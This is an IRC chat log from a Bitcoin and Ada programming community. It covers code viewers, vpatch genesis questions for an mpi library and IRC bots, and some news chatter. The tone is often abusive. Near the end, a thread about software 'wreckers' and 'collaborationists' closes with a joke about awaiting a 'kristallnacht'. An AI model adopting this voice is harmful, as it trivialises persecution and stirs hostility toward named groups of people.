as state-of-the-art wwwtronic ada viewer : http://unzip-ada.sourceforge.net/za_html/index.htm ( they're auto-generated per project ) 1738993;1510767980;asciilifeform;it doesn't do the hierarchical or line-numbering thing tho 1738994;1510767988;mircea_popescu;and in other log lulz, http://btcbase.org/log/2013-12-03#404575 1738995;1510767988;a111;Logged on 2013-12-03 23:49 ThickAsThieves`: It's hard to explain puns to kleptomaniacs because they always take things literally. 1738996;1510767996;asciilifeform;but does have linking ( e.g. of definitions of procedures ) 1738997;1510768051;mircea_popescu;terrible. 1738998;1510768069;mircea_popescu;basically, looks like a tripod site. if i want to link you to the "c" in Read(s,c); what do i do ? 1738999;1510768075;asciilifeform;it won't win artistic awards but does about half of the job 1739000;1510768082;asciilifeform;nao if something did whole of it.. 1739001;1510768089;mircea_popescu;neverfmind artistic. it's as functional as a hammer in a pot of soup. 1739002;1510768103;mircea_popescu;how do i fucking link the c ? 1739003;1510768107;mircea_popescu;how do i adnotate the s ? 1739004;1510768150;mircea_popescu;how do i do anything beyond "here's a doodle, click 80 times in inept trees of documents like it's 1980 all over again and steve jobs hasn't yet come to put into abject slavery all sorts of retarded academiacs who really thought they had something to say" ? 1739005;1510768152;asciilifeform;links look like http://unzip-ada.sourceforge.net/za_html/lzma_enc__adb.htm#23_33 1739006;1510768161;mircea_popescu;no. how do i link the c. 1739007;1510768177;asciilifeform;ah you meant the actual c pointed-at, vs the definition 1739008;1510768179;mircea_popescu;thing has no way to underline byte error from tester to author and you give it a passing grade ? 1739009;1510768184;mircea_popescu;yes. 1739010;1510768188;asciilifeform;in the given hack, you can't. hence i said 'does half the job' 1739011;1510768195;mircea_popescu;it does none of the job. 1739012;1510768209;asciilifeform;it's still a fail. but at least has the notion that routines are entities that oughta be pointable to. 1739013;1510768232;mircea_popescu;http://trilema.com/2017/how-the-beastforumcom-private-messaging-function-became-a-paid-user-only-item/#selection-91.5-95.0 << hey mp, shouldn['t this 12 read 19 instead ? 1739014;1510768244;asciilifeform;does a good bit moar of the job, than pasting a txt ( into wp or otherwise ) and manually grunting to annotate. 1739015;1510768252;mircea_popescu;oh thank you mp, i see now what you had been trying to tell me for the past two hours because that's the sort of a mind i am. will fix now! 1739016;1510768273;mircea_popescu;asciilifeform who is going to read anything but non-auto adnotations. 1739017;1510768300;asciilifeform;references to code outside of the current page, oughta be automatic links 1739018;1510768316;asciilifeform;this avoids breaking flow in the reader's head. 1739019;1510768321;mircea_popescu;wp module to do that is one page long. 1739020;1510768328;asciilifeform;it has to parse the ada. 1739021;1510768333;asciilifeform;so prolly not 1pg. 1739022;1510768338;asciilifeform;but entirely possible to write. 1739023;1510768352;mircea_popescu;can't imagine why not, ada still uses fixed calling, you can't call by pointer-to-string or shit can you 1739024;1510768354;asciilifeform;it also has to have some notion of ada scope. 1739025;1510768368;asciilifeform;mircea_popescu: lol not in ~my~ fascist ada. 1739026;1510768373;mircea_popescu;ok so then. 1739027;1510768388;asciilifeform;but yes such a thing is writable. 1739028;1510768392;asciilifeform;not afaik written tho. 1739029;1510768432;mircea_popescu;the important points here are a) scheduling. if we're in the middle of a conversation, low ranking rando won't make any friends by dumping comments re paste. if you had the decency to put it on blog, he can leave you a comment, which you can read when you have the time. major efficiency boon for everyone. 1739030;1510768434;asciilifeform;i'd even settle for a very low-tech, orcish thing, that lives as emacslisp and shits out a wp post . 1739031;1510768451;mircea_popescu;and b) correct linkage. such as above displayed, arbitrary byte, such as so on. 1739032;1510768457;asciilifeform;eventually will have to sit down and write it, if no one else rises to it 1739033;1510768476;mircea_popescu;there's also c) where it helps the mind mature into something that'll eventually be able to usefully v, but that's a secret. 1739034;1510768534;mircea_popescu;(the a above may seem minor, but both apeloyee and some random noob yest ran into th eexact problem. only one survived it far we can tell.) 1739035;1510768558;phf;http://btcbase.org/log/2017-11-15#1738923 << the underutilized part of patches visualizer is the tree view, it shows what specific file will actually look like when pressed with a specific patch, e.g. http://btcbase.org/patches/programmable-versionstring/tree/bitcoin/src/crypter.cpp as you can see formatting is not particularly good, but it supports highlighting various languages including Ada. so given a normal v-based workflow (is there one?) can get 1739036;1510768558;a111;Logged on 2017-11-15 17:19 asciilifeform: this item calls for something like phf's v-viewer 1739037;1510768559;phf; a visualizer for free 1739038;1510768578;asciilifeform;hey phf -- you ever published the v-viewer ? 1739039;1510768600;phf;no, it 1739040;1510768602;phf;err 1739041;1510768606;mircea_popescu;phf i dunno, if there is slow to uptake. 1739042;1510768623;asciilifeform;might be a considerable head start for item in this thread 1739043;1510768631;asciilifeform;depending on what it's made of 1739044;1510768680;phf;basically the tree viewer is half baked and i'm not eating my own dog food here, so i'm relying on teh public to give me feedback ("phf fucking fix this fucking thing") which so far has not been forthcoming 1739045;1510768696;asciilifeform;phf: ftr i'm quite satisfied with it 1739046;1510768708;asciilifeform;aside from 1 nitpick, the charts overflow my screen 1739047;1510768710;mircea_popescu;phf well, is it itself a v-chain ? 1739048;1510768796;phf;asciilifeform: no haven't published it, it's a big ball of mud that in the gran lisp machine tradition lives in TMSR package, along with log bot, log visualizer, log database, etc. so if there's interest in any specific parts i can extract them into library and publish, but i've not been planning on publishing the whole thing 1739049;1510768833;phf;i think it might be worthwhile to publish for example vpatch parser and presser machinery though 1739050;1510768845;phf;because we don't have an equivalent available 1739051;1510768846;asciilifeform;phf: consider at the very least sawing off the code parser and entire set of items that pertain to www 1739052;1510768852;asciilifeform;into something publishable 1739053;1510768879;asciilifeform;but ideally yes whole thing 1739054;1510768881;phf;like a kind of vpatch gitlab thing, ok i'll think where and how to slice 1739055;1510768909;asciilifeform;aha, that's what it was called. the item which i suspect is 99% of what draws the heathens into 'git' etc 1739056;1510768916;asciilifeform;the www viewer thing. 1739057;1510769004;mircea_popescu;gah. i feel like in a spider web, every move to improvement resulting in worse shittifyication. 1739058;1510769007;phf;mircea_popescu: it is (though there's an interruption in the chain that i need to regrind) that doesn't help me though, because it's the whole thing, rather than parts. 1739059;1510769017;mircea_popescu;phf what do you mean "publish", dump another paste ? 1739060;1510769021;asciilifeform;mircea_popescu: how's that 1739061;1510769034;mircea_popescu;so that THIS also becomes an "unowned random bit of nothing" and we just sink into idocy ervery year a little deeper ? 1739062;1510769061;mircea_popescu;"i've not been planning on publishing the whole thing" << why not, are you planning to what, sell it ? 1739063;1510769082;mircea_popescu;or did you just make to try and ruin the republic thereby, "here's an engine, it sorta works, im never making it work correctly haha and fuck you" ? 1739064;1510769095;phf;mircea_popescu: no, publish meaning put relevant parts into patch visualizer, i otherwise haven't published anything. log/patch visualizer is presented as a service, as far as log is concerned the philosophy has been "write your own" and there's not been much interest in the v part until now 1739065;1510769107;mircea_popescu;are you gonna start charging for it then ? 1739066;1510769300;phf;i resent the "sorta works" bit, i've been responsive with any feedback related to log and patch visualizer. i've not read todays log so maybe i missed how /patches fits into greater scheme of things 1739067;1510769345;mircea_popescu;don't resent it ; instead, let's examine what this "ima publish" entails. 1739068;1510769377;mircea_popescu;there's two major management problems with publishing : one if it's done heathenly, like alf does it, pastes and whatnot ; the other is subjective, "i published it so it's no longer my thing". 1739069;1510769396;mircea_popescu;neither of these are good outcomes. 1739070;1510769460;mircea_popescu;now, which of these two didn't you have in mind with http://btcbase.org/log/2017-11-15#1739048 cuz i read both in there. 1739071;1510769460;a111;Logged on 2017-11-15 17:59 phf: asciilifeform: no haven't published it, it's a big ball of mud that in the gran lisp machine tradition lives in TMSR package, along with log bot, log visualizer, log database, etc. so if there's interest in any specific parts i can extract them into library and publish, but i've not been planning on publishing the whole thing 1739072;1510769479;phf;have i stopped beating my wife yet? 1739073;1510769516;mircea_popescu;fine, so i read 'em when they were absent, woe unto me. 1739074;1510769517;phf;i'm not sure what publishing the whole thing entails, the only bit that i even considered is something along the lines of what trinque did with his irc bot 1739075;1510769575;mircea_popescu;i'm not sure what the benefit of publishing would be. so what, someone else runs it or what. 1739076;1510769615;asciilifeform;in this particular case, so that something else can be built from same parts 1739077;1510769628;mircea_popescu;why would you build something else instead of using the something that already is ? 1739078;1510769646;mircea_popescu;he wrote it, let him run it, and not be discouraged by "not forthcoming" or w/e happened there. 1739079;1510769679;asciilifeform;the current item, as i understand it, doesn't interoperate with wp ( or otherwise blogotronic ) 1739080;1510769694;mircea_popescu;what exactly did happen ? phf wrote a fine v parser ; jurov sweated white hairs getting an email system into alf-tip-top shape only for it to not be used as soon as it was got to work... 1739081;1510769701;mircea_popescu;there's some neuralgia involved here. what is it ? 1739082;1510769721;asciilifeform;hey i still to this day use jurov's system, whenever submitting trb patch. 1739083;1510769723;mircea_popescu;asciilifeform how would you see it interoperate ? there's links in html, is more needed ? 1739084;1510769729;mircea_popescu;asciilifeform when was that last ? 1739085;1510769739;asciilifeform;the 'wires' thing 1739086;1510769765;asciilifeform;and moar recently the db timings experiment 1739087;1510769783;mircea_popescu;and so the problem there was what ? 1739088;1510769789;asciilifeform;none, it worked 1739089;1510769814;mircea_popescu;so the desired interop with wp would look like what ? 1739090;1510769828;phf;well, that's fine by me, i think what happened is some other conversation got crossed over into what i was thinking. alf said you gotta publish, to which i responded with a very non committal "i'll think about it". but there were parts that i was thinking of publishing. specifically vpatch parser and presser both of which don't really on external tools, but accomplish the whole thing in memory. might be useful for further vtronics 1739091;1510769848;phf;*don't rely 1739092;1510769850;mircea_popescu;phf nothing wrong with that. 1739093;1510769865;mircea_popescu;how is vtron currently fed, via email list thing jurov made ? 1739094;1510769907;phf;it is still manual process, and we've had a thread about it along the lines of "build it when there's need" 1739095;1510769927;mircea_popescu;aha. 1739096;1510769940;phf;manual meaning that i see a vpatch in any random place, i post it (obviously it benefits me, more content etc.) 1739097;1510769946;asciilifeform;( jurov's apparatus worx great. but it only introduces messages to the ml. ) 1739098;1510769963;mircea_popescu;so then, it's more like a sort of curated "Best of" blogposts eh ? you go around reading people's blogs like the editor of old science mags, going "plox put this in format for editorial" 1739099;1510769986;mircea_popescu;this as described could work splendidly well. 1739100;1510770028;phf;correct, so far there's not been any editorializing. even dead vpatches live in their own patchset 1739101;1510770042;asciilifeform;this is not necessarily a bad thing 1739102;1510770068;mircea_popescu;alright so then is this structure deemed seaworthy for a while ? 1739103;1510770080;phf;but oftentimes when i post a patch something comes up anyway. like the recent mpi release by asciilifeform is a vpatch, but it lacks a genesis, which breaks all kinds of assumptions (e.g. the tree visualizer wouldn't work at all) 1739104;1510770103;asciilifeform;phf: didja ever explain what you mean 'lacks genesis' ? 1739105;1510770139;asciilifeform;your copy of mpi-genesis.tar.gz was lost, or wat 1739106;1510770160;mircea_popescu;i had thought i saw a genesis too. 1739107;1510770160;phf;mpi-genesis.tar.gz is not a vpatch though 1739108;1510770173;phf;or is it? i might've missed that part 1739109;1510770180;mircea_popescu;um. i dunno, what's wrong with it ? 1739110;1510770187;asciilifeform;a yes it is phf 1739111;1510770193;asciilifeform;tarball contains 2 files, the genesis, and sig 1739112;1510770209;phf;oooh, well, that fixes that then 1739113;1510770210;mircea_popescu;maybe his thing didn't eat it for some reason. 1739114;1510770218;asciilifeform;and it's a perfectly legit ( manually ground, from mpi, just like trb genesis was from 0.5.3 ) genesis. 1739115;1510770227;mircea_popescu;phf do you have roughly the equiv of a "feed paste in here" slit for it ? 1739116;1510770246;asciilifeform;phf: if your thing wasn't able to parse it, i'd much like to know why 1739117;1510770272;asciilifeform;http://www.loper-os.org/?p=1533 << mircea_popescu , phf whole shebang , for reference 1739118;1510770274;phf;mircea_popescu: i briefly had it, but removed it due to lack of use (it also predates the sbcl rewrite, so it was particularly janky code) 1739119;1510770282;mircea_popescu;aha. 1739120;1510770297;phf;mircea_popescu: right now it's an ssh copy and (tmsr:refresh-vpatches) call 1739121;1510770298;mircea_popescu;well anyway, this'd be a great time to go through the slag, "items that didn't work list" see what other mpis are in there 1739122;1510770333;asciilifeform;afaik there's nothing peculiar re the vdiff. lemme know why your parser barfed, phf , when you find out 1739123;1510770346;mircea_popescu;ima have diana_coman put the whole eulora crypto in vpatch form even if we're not yet advanced enough with the cleaning of codebase to use v properly. 1739124;1510770352;phf;asciilifeform: it didn't, i just didn't realize that there was a proper genesis 1739125;1510770355;asciilifeform;aaa 1739126;1510770357;mircea_popescu;will take a public comment blogpost pass first, so ideally early next year 1739127;1510770379;mircea_popescu;reuses large swaths of alf and peterl work. 1739128;1510770397;mircea_popescu;(so in this sense saves them the hassle to v themselves ; though sigs welcome of course) 1739129;1510770424;asciilifeform;mircea_popescu: my sigs for the mpiism are on the linked pg. 1739130;1510770430;mircea_popescu;aha. 1739131;1510770441;mircea_popescu;you proposing better idea to branch it off mpi ? 1739132;1510770489;asciilifeform;you can produce this mechanically. the unfortunate bit is that it gives same problem as basing trb on original 5.3.1 tarball contents did 1739133;1510770508;asciilifeform;( namely, the volume of deletolade and moveolade liquishit resulting, is multi-megabyte ) 1739134;1510770590;mircea_popescu;i meant, rather than make a genesis for eu-crypto, just make a branch of your mpi 1739135;1510770591;asciilifeform;prior to realizing that ffa is the troo path, asciilifeform actually planned to entirely re-do the mpi item 1739136;1510770605;asciilifeform;because it was , as you can probably see, done barbarically 1739137;1510770609;mircea_popescu;but yes, the alternative is to genesis it and then link downstream from ffa. 1739138;1510770635;asciilifeform;( the correct way, ought to have been, to do it in individual tiny snips from gpg-1.4.10, so the pedigree can be authenticated . ) 1739139;1510770652;mircea_popescu;i am not interested in claiming any kochian pedigrees. 1739140;1510770676;asciilifeform;fair'nuff 1739141;1510770704;asciilifeform;asciilifeform certainly did not make any attempt to sanitize the remaining routines or otherwise ascertain correctness, however 1739142;1510770710;asciilifeform;so it is still entirely a koch product 1739143;1510770734;asciilifeform;but i suppose is now a dried, rather than soft turd. 1739144;1510770752;phf;http://btcbase.org/patches?patchset=mpi http://btcbase.org/patches/mpi_second_cut http://btcbase.org/patches/mpi_second_cut/tree/mpi/mpi-mul.c#L108 etc. 1739145;1510770765;asciilifeform;oh hey. 1739146;1510770768;mircea_popescu;anyway. my conclusion is ima do the eu-crypto as a new genesis, because really most of the koch crap in mpi (esp the prng crap) got dirtched 1739147;1510770783;asciilifeform;mircea_popescu: it wasn't even included in mine 1739148;1510770805;asciilifeform;( i even threw out the prime gen ) 1739149;1510770871;mircea_popescu;http://btcbase.org/patches/mpi_second_cut << dat red... 1739150;1510770878;asciilifeform;snippetysnip 1739151;1510770909;asciilifeform;thing could shrink further, i left koch's buffering system , used by the logger ( also remained ), intact 1739152;1510770910;phf;i added readme to mpi patchset also 1739153;1510770911;mircea_popescu;http://btcbase.org/patches/mpi_second_cut#L5394 maximal lulz 1739154;1510770912;asciilifeform;ditto allocator 1739155;1510770966;asciilifeform;lol 1739156;1510771013;mircea_popescu;this i confess is a fine way to read code. 1739157;1510771020;diana_coman;mircea_popescu, we can do it yes; I guess the question is where to start i.e. no point in starting from koch that I can see; starting from asciilifeform 's sane-mpi would be one; adds and deletes stuff 1739158;1510771041;mircea_popescu;diana_coman so what's your call, rather write as mpi branch or rather stand alone ? 1739159;1510771059;mircea_popescu;the significant benefit of branch would be that this'd be the first in-the-field case to demonstrate this interprojects interop thing. 1739160;1510771081;diana_coman;it uses the mpi part and quite substantially so works 1739161;1510771101;asciilifeform;also helps that my mpi builds a standalone static lib 1739162;1510771108;asciilifeform;( linker then links it ) 1739163;1510771110;mircea_popescu;it's basically mostly that + the keccac ada peterl wrote + some new stuff 1739164;1510771130;mircea_popescu;asciilifeform aha. kinda iirc the whole idea of the design at the time was for to be able to have this convo today. 1739165;1510771137;diana_coman;I get the feeling that v is not really seen as versioning in the sense of these are the steps I took, still mulling a bit on thiw 1739166;1510771169;mircea_popescu;i can't see why it wouldn't be. 1739167;1510771173;asciilifeform;also gotta nitpick, this is not the first time vtronic crosspollination, 1739168;1510771183;asciilifeform;trinque's logotronics were used by later bots 1739169;1510771194;asciilifeform;( iirc by ben_vulpes ) 1739170;1510771207;mircea_popescu;link to this ? 1739171;1510771228;asciilifeform;hmm 1739172;1510771244;mircea_popescu;http://btcbase.org/patches?patchset=bot&search= ? 1739173;1510771253;asciilifeform;possibly i am mistaken about this 1739174;1510771268;asciilifeform;because i also ended up with http://btcbase.org/patches?patchset=bot&search= and dun see where they meet 1739175;1510771276;trinque;yes, logs.bvulpes.com is powered by a logbot 1739176;1510771284;asciilifeform;but is it published anywhere 1739177;1510771289;asciilifeform;and itself vtronic 1739178;1510771293;asciilifeform;or did i dream it 1739179;1510771294;trinque;that I do not know 1739180;1510771295;mircea_popescu;trinque user rather than you know, patch published 1739181;1510771299;phf;ircbot-genesis is trinque's , ircbot-multiple-channels-corrected is ben_vulpes's code 1739182;1510771302;mircea_popescu;nothing wrong with it 1739183;1510771307;trinque;nah don't think he had to patch 1739184;1510771309;mircea_popescu;phf yes but how do they lkink ? 1739185;1510771316;trinque;log viewer just reads same db 1739186;1510771318;mircea_popescu;http://btcbase.org/patches?patchset=fg&search= << in other olds. 1739187;1510771319;phf;with an arrow 1739188;1510771333;trinque;phf: correct 1739189;1510771340;phf;i couldn't resist 1739190;1510771342;mircea_popescu;ahahaah what! 1739191;1510771344;asciilifeform;mircea_popescu: actually i made a quite heavy use of phf's viewer, when linking to fg details in log 1739192;1510771346;diana_coman;mircea_popescu, depending on what we use finally it might be ada-serpent too,unclear 1739193;1510771390;diana_coman;and re peterl's keccak implementation trouble is that thoroughly testing it looks atm as much work as writing a new one in the process anyway so whatever version ends up with tests and everything is the one that will make it into v too I would say 1739194;1510771394;mircea_popescu;inasmuch as logbot (bv item) has a genesis, it is not a branchoff. yes it imports from a different line. 1739195;1510771435;mircea_popescu;diana_coman some bits of code, such as heavily linked against standard hash etc would normally take a zillion reimplementations rereads etc anyways. 1739196;1510771466;diana_coman;all the merrier for sure, yes 1739197;1510771500;trinque;logbot's my thing. 1739198;1510771504;trinque;but anyhow 1739199;1510771506;phf;mircea_popescu: there's a bit of confusion there with logbot, because ircbot and logbot were both published by trinque by they are not vtronic connected, they rely on lisp machinery to load each other. multichannel equivalents of both were publshed by ben_vulpes 1739200;1510771510;mircea_popescu;sorry ircbot is ben_vulpes ? 1739201;1510771524;mircea_popescu;i am well confused yes. 1739202;1510771538;mircea_popescu;so trinque you made two diff items that differ how ? one's the irc bot the other's the logger ? 1739203;1510771542;trinque;ircbot's a lisp class that sits connected to IRC 1739204;1510771552;trinque;logbot's a descendent class that puts log lines in a db 1739205;1510771567;mircea_popescu;and they each got their own genesis ? 1739206;1510771577;trinque;ben_vulpes patched former for multiple channel support, and latter to use former changes 1739207;1510771580;mircea_popescu;phf how do i click on ircbot-multiple-channels to see what's there ? 1739208;1510771604;trinque;then wrote a completely separate html viewer for the db logbot extrudes 1739209;1510771614;trinque;each got own genesis yep. 1739210;1510771625;phf;mircea_popescu: it's actually a broken patch (i.e. it was published broken), i need to move it to deprecated, since *-corrected has been published since 1739211;1510771651;mircea_popescu;i have been sitting here for 10 mins trying to figure out wtf this is, not getting any closer 1739212;1510771655;phf;:D 1739213;1510771658;mircea_popescu;so im reading trinque.org now in hopes there's explainy. 1739214;1510771668;phf;oh and don't open link #3 that crashes everything!1 1739215;1510771695;trinque;http://trinque.org/2016/08/ 1739216;1510771732;mircea_popescu;btw re the namecheap i see here : http://btcbase.org/log-search?q=%22namesilo%22 1739217;1510771736;mircea_popescu;so far working well. 1739218;1510771767;trinque;cool, I'll look into that then. 1739219;1510771777;mircea_popescu;trinque you know the cursive "trinque" overwrites the top title on the page on my system ? 1739220;1510771816;mircea_popescu;trinque having read these two articles i dunno why they got independent genesises. 1739221;1510771820;trinque;probably css onanism I committed not working 1739222;1510771844;trinque;whysat? 1739223;1510771859;mircea_popescu;well for one thing, logbot can't stand up without ircbot. 1739224;1510771895;mircea_popescu;first line in install being "install this other thing" is generally an indication item present can't be genesised. maybe not an absolute rule, esp if multiple priors involved. but if just one... 1739225;1510771927;asciilifeform;kalash bullet dun work without kalash either, but they are quite separate items 1739226;1510771934;phf;(this is actually related to the code reuse thread we had, the extra-v code reuse machinery is fundamentally at odds with vtronic approach, the conclusion in that thread was "do more retyping it's good for you", which i agree with, but i believe asciilifeform was against it) 1739227;1510771962;mircea_popescu;asciilifeform is against all things, gotta be dragged kicking and screaming over all thresholds. 1739228;1510771966;mircea_popescu;i got flea in my ointment! 1739229;1510771967;asciilifeform;retyping is great 1739230;1510771977;asciilifeform;being a human diff, on other hand, is not great. 1739231;1510771990;asciilifeform;leave mechanical diffing to the machine, it's why we even have machine. 1739232;1510772010;mircea_popescu;unavoidable. see the screams of the lost, http://btcbase.org/log/2017-11-15#1739193 1739233;1510772010;a111;Logged on 2017-11-15 18:43 diana_coman: and re peterl's keccak implementation trouble is that thoroughly testing it looks atm as much work as writing a new one in the process anyway so whatever version ends up with tests and everything is the one that will make it into v too I would say 1739234;1510772033;asciilifeform;just how avoidable, or not, is separate q 1739235;1510772051;mircea_popescu;asciilifeform re kalash bullet, my usage list for kalash bullet is "lube generously, insert" not "put into rifle". so it makes sense to genesis. 1739236;1510772054;trinque;I can see it, and also that the case where it would be impossible (tangled hierarchy, mutual dependency) is idiocy. 1739237;1510772063;trinque;goes right to what I've been saying in the hypertext thread, too 1739238;1510772076;asciilifeform;mircea_popescu: likewise i can see logbot being used without ircbot -- with, say, shortwavebot 1739239;1510772077;mircea_popescu;so is this a regrind then ? 1739240;1510772087;trinque;this requires that particular hash antecedent, and not my blog post on the subj 1739241;1510772089;mircea_popescu;asciilifeform that'll be an import if/when happens 1739242;1510772118;asciilifeform;point being that they are independent components that could be changed out 1739243;1510772125;asciilifeform;rather than logical parts of same proggy 1739244;1510772126;mircea_popescu;otherwise the eminently usable trinque bot is what, iirc in hanbot's hands too she was contemplating doing soemthing 1739245;1510772141;mircea_popescu;asciilifeform your brand of logical here is inadequate. the matter isn't what things could be. 1739246;1510772145;mircea_popescu;the matter is what things are. 1739247;1510772154;mircea_popescu;when they become something they could have been but weren't, they'll be something else. 1739248;1510772155;asciilifeform;they're separate programs. 1739249;1510772166;mircea_popescu;everything's SEPARABLE. including your spleen. 1739250;1510772177;mircea_popescu;but as they stand right now, they're not separate. 1739251;1510772177;asciilifeform;moar like my slippers. 1739252;1510772190;trinque;can name the antecedent and still put vpatches in two piles 1739253;1510772192;asciilifeform;( of which i have only 1 pair atm, but they did not ship with my feet ) 1739254;1510772206;trinque;"beyond here this crocodile grows robot legs" 1739255;1510772240;asciilifeform;gotta prevent the spittoon from being in one strand. otherwise e.g. linux kernel becomes an antecedent to everything 1739256;1510772282;mircea_popescu;trinque so you'd rather keep it as two separate items is the idea here ? 1739257;1510772291;trinque;nope, agreeing actually 1739258;1510772301;trinque;logbot's antecedent *is* ircbot 1739259;1510772319;mircea_popescu;ah. alright. without prejudice to the principle, "can't make everything one single hairstrand", there's also the consideration that can't make the whole repuiblican scalp buzz-cut 1739260;1510772431;mircea_popescu;and otherwise to cap a very productive morning... are there any neglected issues ? 1739261;1510772486;trinque;better stated, I observe that nothing about having a continuous tree prevents naming particular runs of the tree, pointing at, using for different purposes. 1739262;1510772500;trinque;I proposed that as a better solution to portability a while back 1739263;1510772516;trinque;rather than #ifdef or *features*-ing the hell out of the code 1739264;1510772525;mircea_popescu;aha. afaik that's the dogma to this day, "whenever you feel like someone's branch can be your genesis" 1739265;1510773362;mircea_popescu;and speaking of bots, lobbes is your idea to genesis lobbesbot ? 1739266;1510774664;mircea_popescu;in other sads, /me ended up readiong log linked from trinque's paybot discussion, can confess no longer remembers what http://btcbase.org/log/2017-08-03#1693391 was about. 1739267;1510774664;a111;Logged on 2017-08-03 18:35 mircea_popescu: trinque i'll dare say it's something else. have you ever seen "a man for all seasons" ? 1739268;1510774772;mircea_popescu;oh, fuck! i just remembered! YAY MEMORY! 1739269;1510775076;phf;getting old,.. wait not yet! 1739270;1510775102;mircea_popescu;:p 1739271;1510775202;ben_vulpes;https://www.timeslive.co.za/sunday-times/business/2017-11-15-bitcoin-surges-in-zimbabwe-after-military-seize-power/ 1739272;1510775211;ben_vulpes;in literal zimbabweisms 1739273;1510775250;asciilifeform;'The price of the cryptocurrency in the Southern African nation jumped as high as $13,499' but in which $ ? 1739274;1510775259;ben_vulpes;goes on to suggest usd 1739275;1510775270;asciilifeform;also gotta wonder what is , e.g., bar of soap in $ there 1739276;1510775283;mircea_popescu;o look, nation of africa progresses some more ? 1739277;1510775289;ben_vulpes;tanks rolling, fiat crashing 1739278;1510775300;phf;cats living with dogs 1739279;1510775309;mircea_popescu;the epitome of this being of course teh austro-hungarians cca 1914. 1739280;1510775374;mircea_popescu;somewhere on trilema the record of "o noes, people FOR NO REASON increased prices, when we're totally gonna win war", but gotta split so will look for it later. 1739281;1510775410;asciilifeform;http://trilema.com/2014/on-july-29-1914 1739282;1510775460;asciilifeform;'The authorities declare that the sudden increase in the prices of provisions and vegetables is totally unwarranted. ... It was officially asserted that there was no reason for apprehension with regard to the food supply, and that it was needless for citizens to start the accumulation of stores of provisions. The only effect of such procedure, it was added, would be to still further raise prices.' etc 1739283;1510775485;mircea_popescu;right-o! 1739284;1510775485;mircea_popescu;bbs 1739285;1510777415;shinohai;How long until Bitcoin Plus plus http://www.bitcoincashplus.org/ 1739286;1510777475;asciilifeform;'Emergency Difficulty Adjustment' << lel 1739287;1510777504;asciilifeform;'Anyone who held Bitcoin at the time Bitcoin Cash Plus was created became owners of Bitcoin Cash Plus. This means that Bitcoin holders as of block 501407 ' << apparently, contrary to appearances, is NOT a fork of bch 1739288;1510777808;asciilifeform;but instead a rerun of the august item 1739289;1510777898;phf;"The need for Harmony arose out of me not finding any suitably powerful sound solution in Lisp. I tried doing a pure Lisp solution at first, but was not able to figure out how to make things go fast without sacrificing design. So, in the interest of performance, I first set out to write a C library that does the essential sound computations for me. This library is called libmixed." 1739290;1510778015;asciilifeform;'sacrificing design' 1739291;1510778051;trinque;pretty sad item to come through "Planet Lisp" RSS 1739292;1510778073;trinque;maybe they meant the other lisp 1739293;1510778171;phf;"shinmera" is part of the new school of common lispers who put out reams of code that's basically ffi to c world. nothing wrong with it per se, but from traditional lisp perspective they are prime wreckers 1739294;1510778262;asciilifeform;the 'it's ok for your sbcl world to segfault' people 1739295;1510778270;asciilifeform;i'll disagree with the 'nothing wrong'. 1739296;1510778296;asciilifeform;plain and simple wreckers, with no asterisks. 1739297;1510778312;asciilifeform;if i want c, i'll write in c. 1739298;1510778344;phf;well, in a sense that it's not a special wrong. they also run systemd and can't wait for wayland etc. etc. 1739299;1510778350;ben_vulpes;http://wookie.lyonbros.com/ comes to mind 1739300;1510778441;asciilifeform;ben_vulpes: what's in there ? openssl ? 1739301;1510778445;phf;ben_vulpes: yeah, one of those people 1739302;1510778471;phf;asciilifeform: uses cl-async which is an ffi to libuv 1739303;1510778474;asciilifeform;aaa 1739304;1510778537;ben_vulpes;yeah, that part 1739305;1510778588;phf;amusingly none of that "super fast" shit is used anywhere. venerable hunchentoot was used used by weitz to deliver consulting solutions (was also used by me for same purpose back when it was tbnl), these super fast toys are used to host author's blog. 1739306;1510778605;asciilifeform;mega-unsurprise 1739307;1510778623;asciilifeform;but this is why they lichen-attack and eat away at the working stuff 1739308;1510778629;asciilifeform;recall the old thread, 1739309;1510778636;asciilifeform;!#s flycheck 1739310;1510778636;a111;60 results for "flycheck", http://btcbase.org/log-search?q=flycheck 1739311;1510778641;asciilifeform;^ typical example 1739312;1510778680;asciilifeform;worthless piece of shit, 'used by no one' until they broke functionality (on crapple) of the venerable and eternal 'flymake' 1739313;1510778688;asciilifeform;and then worked into the docs, 'flymake is obsolete' nonsense 1739314;1510778721;asciilifeform;same thing is being done to, e.g., gcc 1739315;1510778725;phf;emacs's cl-lib vs cl, etc. 1739316;1510778740;asciilifeform;'why are you still using that obsolete...' 1739317;1510778793;phf;shit my emacs greets me with iswitchb-mode is obsolete on boot, if i cared enough i'd patch it out, but it's a daily meditation on the general level of fuck 1739318;1510778849;phf;(there's obviously no feature equivalent mode for iswitchb, recommended replacements while i'm sure work for some are overengineered monstrosities) 1739319;1510778880;ben_vulpes;helm is definitely that 1739320;1510779282;asciilifeform;the solution is absolutely never 'hey which flycheck turd should i use nao' 1739321;1510779298;asciilifeform;but rather confiscation of the whole shebang from the wreckers. 1739322;1510779370;asciilifeform;and in every case to find a name. ~who~ broke $proggy. and what else has he shat into. 1739323;1510779456;asciilifeform;find also the collaborationists, who tolerated. 1739324;1510779472;asciilifeform;( rms, sad as it may be to say, is among these. ) 1739325;1510784040;phf;still waiting for the kristallnacht 1739326;1510785127;asciilifeform;hey mircea_popescu , radio havana reported 'tres muertos' in yer earthquake. 1739327;1510785463;BingoBoingo; asciilifeform you just tell people "follow the last". << Tag, category, etc. 1739328;1510785695;lobbes;http://btcbase.org/log/2017-11-15#1739265 << My ultimate goal with the thing would be to use trinque's ircbot and try and rebuild lobbesbot off of that. As it stands now, lobbesbot is nothing more than a suite of 'supybot modules' I wrote 1739329;1510785695;a111;Logged on 2017-11-15 19:16 mircea_popescu: and speaking of bots, lobbes is your idea to genesis lobbesbot ? 1739330;1510785697;lobbes;i.e. it still uses someone else's code for the 'core' irc functionality. I'd rather that core functionality be ircbot, but of course this'll be a huge time investment migrating everything (and learning lisp). In the hopper, though. 1739331;1510785970;BingoBoingo; but i suppose is now a dried, rather than soft turd. << So you broom rather than mop 1739332;1510787222;asciilifeform;meanwhile, in психушка noose, https://archive.is/5aOSp >> 'The U.S. Food and Drug Administration approved a pill Monday that has a digital ingestion tracking system which can tell if medication was ingested by a patient. ... to allow easier treatment of schizophrenia, bipolar disorder and some depression' 1739333;1510787285;ben_vulpes;take yr soma, citizen 1739334;1510787686;shinohai;How does it help the poor schizophrenic ? He's probably freaking out "I'll bet they know I took this pill......" 1739335;1510787820;asciilifeform;lol help 1739336;1510788531;asciilifeform;!!up PeterL_ 1739337;1510788531;deedbot;PeterL_ voiced for 30 minutes. 